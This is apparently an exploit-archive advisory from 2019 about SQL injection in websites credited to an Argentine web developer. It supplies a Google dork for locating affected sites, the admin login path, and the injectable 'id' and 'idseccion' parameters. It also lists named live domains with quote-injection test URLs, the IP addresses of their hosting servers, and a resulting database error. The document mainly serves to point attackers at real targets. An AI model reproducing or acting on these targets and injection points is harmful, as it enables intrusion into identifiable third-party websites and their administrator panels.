#################################################################### # Exploit Title : Desarrollado por Rodrigo Guidetti RG21 Argentina SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 16/01/2019 # Vendor Homepage : rg21.com.ar/rodrigoguidetti/index.php # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''Desarrollado por Rodrigo Guidetti'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] #################################################################### # Admin Panel Login Path : ************************* /admin/login.php # SQL Injection Exploit : *********************** /contenido.php?id=[SQL Injection] /listaNotas.php?idseccion=[SQL Injection] #################################################################### # Example Vulnerable Sites : ************************* [+] vallauno.com.ar/contenido.php?id=944%27 => [ Proof of Concept ] => archive.is/szGew [+] zazpirakbat.com/contenido.php?id=1%27 Note : (167.250.5.32) => There are 357 domains hosted on this server. Note : (200.58.120.13) => There are 364 domains hosted on this server. #################################################################### # SQL Database Error : ********************** Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''944'' ORDER BY id DESC LIMIT 0, 8' at line 2 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################